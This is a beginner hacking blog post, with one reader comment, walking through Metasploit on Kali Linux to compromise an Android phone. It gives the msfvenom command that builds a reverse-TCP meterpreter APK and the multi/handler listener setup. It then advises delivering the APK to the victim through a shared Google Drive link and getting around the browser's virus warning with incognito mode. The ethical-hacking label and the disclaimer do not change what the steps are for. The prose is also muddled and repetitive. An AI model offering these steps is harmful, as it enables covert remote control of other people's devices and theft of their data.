Today the article is much interesting than other articles, in this today article we are working on kali Linux os. To exploit a device and controlling it as an ethical hacking beginner, so let start then first let we get some knowledge about "Metasploit" and then we will start our exploiting work, I will go stepwise in detail by providing a screenshot of each command, what we are using, then let begin.
If you don't know about Kali Linux, then read this.
Click here
in front user on which we want to attack.
If you don't know about Kali Linux, then read this.
Click here
what is "Metasploit"?
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.
Its best-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and related research.
The Metasploit Project includes anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Metasploit is pre-installed in the Kali Linux operating system.
This above information is provided by wiki.com
In short, Metasploit is used to controlling a device by using network and used by cybersecurity to gather information about any victim or any person.
Then let begin.
Disclaimer.
" Do not attempt to violate the law with anything contained here. If you planned to use the content for illegal purposes, then please leave this site immediately! We will not be responsible for any illegal actions".
How to exploit a device by using Metasploit.
- First, boot in your kali Linux os if you are using it in a virtual box.
- Open your terminal in kali Linux.
After opening the terminal type.
Type this
"msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT+4444 R > giveanyname.apk" you will get this command in screenshot.
Hit enter, why this command we are given, after typing this command an app will be created in your kali Linux file manager which we have to installin front user on which we want to attack.
NOTE
In IP address put your IP address of the system, if you don't know your IP then open a new terminal and type " ifconfig " then it will show your IP then put that. LHOST=your IP, Now let continue with the next step.
Then an app will be saved in the file manager by the name which you have given to it. Next
Now open a new terminal and type"msfconsole" hit enter now the terminal will run Metasploit tool, Which is our main part to exploit a device, now nextIt will open like this
Now there are many questions stands front while, testing this attack. can Metasploit attack can be used on WAN (wide area network)? Then the answer is no it only works on LAN (local area network). yes, it also works on WAN "sounds easy na" but it may harmful, and may you can coat by cops for that we have to do is changing settings.
Now follow the step as shown in the screenshot.
Type the command number wise
- use multi/handler Hit enter
- set payload android/meterpreter/reverse_tcp Hit enter
- set lhost your ip Hit enter
- set lport 4444 Hit enter
- The main commands are highlighted you can check all command in screenshot follow like that only.
Half prosses is done now the next step.
Download the app which we have made for the device of the front user. save the app in google drive then share the link to the front user to download the app. I have noticed one thing when I shared the google drive link the app downloading link was not opening it was saying file as a virus but it doesn't contain any virus, so how we can download that app in the device of the front user.
open chrome then open incognito mode then paste the link and then install the apk file and then install it in the device. As this work is done then continue with our msfconsole terminal.
Now type "exploit" and hit enter and that's it our command work is over, now when the user click on the app to open it we will get like this message that the user has opened the app, then you meterpreter to type the attack command. as shown in the screenshot.
You can see in the screenshot how it's working.
Now there is so much command that you can use for the attack, if you want to see all commands list only type "help" and hit enter.
For example type "sysinfo" and hit enter then it will show the user's device information version and many more things you can see.
That's it, meet you in the next interesting article till then stay tuned
Its working man
ReplyDelete